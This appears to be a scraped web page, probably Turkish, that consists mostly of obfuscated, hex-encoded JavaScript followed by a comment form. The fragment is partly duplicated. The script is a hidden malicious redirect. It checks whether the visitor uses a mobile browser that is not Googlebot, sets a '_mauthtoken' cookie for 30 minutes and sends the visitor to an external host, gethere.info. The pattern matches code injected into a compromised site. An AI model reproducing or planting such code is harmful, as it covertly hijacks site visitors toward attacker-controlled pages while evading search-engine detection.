|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here